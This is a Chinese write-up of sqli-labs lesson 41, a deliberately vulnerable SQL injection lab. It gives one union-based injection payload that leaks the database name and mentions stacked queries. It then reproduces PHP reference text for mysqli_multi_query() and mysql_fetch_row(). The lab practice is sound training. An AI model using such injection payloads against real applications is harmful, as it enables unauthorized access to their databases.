sqli-labs(41) and 两php函数的讲解

0X01 构造闭合

发现 不需要闭合

直接构造

id=-1 union select 1,database(),3

成功 注入

0X02 堆叠注入同道理 一样的

这里我们来了解一下这个函数 mysqli_multi_query()

定义和用法

mysqli_multi_query() 函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。
语法
 mysqli_multi_query(connection,query); 

参数     描述
connection     必需。规定要使用的 MySQL 连接。
query     必需。规定一个或多个查询，用分号进行分隔。
技术细节
返回值：     如果第一个查询失败则返回 FALSE。
PHP 版本：     5+

mysql_fetch_row() 函数从结果集中取得一行作为数字数组。
语法

mysql_fetch_row(data)

参数     描述
data     必需。要使用的数据指针。该数据指针是从 mysql_query() 返回的结果。
说明

mysql_fetch_row() 从和结果标识 data 关联的结果集中取得一行数据并作为数组返回。每个结果的列储存在一个数组的单元中，偏移量从 0 开始。

依次调用 mysql_fetch_row() 将返回结果集中的下一行，如果没有更多行则返回 FALSE。
返回值

返回根据所取得的行生成的数组，如果没有更多行则返回 false。
例子

<?php
$con = mysql_connect("localhost", "hello", "321");
if (!$con)
  {
  die('Could not connect: ' . mysql_error());
  }

$db_selected = mysql_select_db("test_db",$con);
$sql = "SELECT * from Person WHERE Lastname='Adams'";
$result = mysql_query($sql,$con);
print_r(mysql_fetch_row($result));

mysql_close($con);
?>

输出：

Array
(
[0] => Adams
[1] => John
[2] => London
)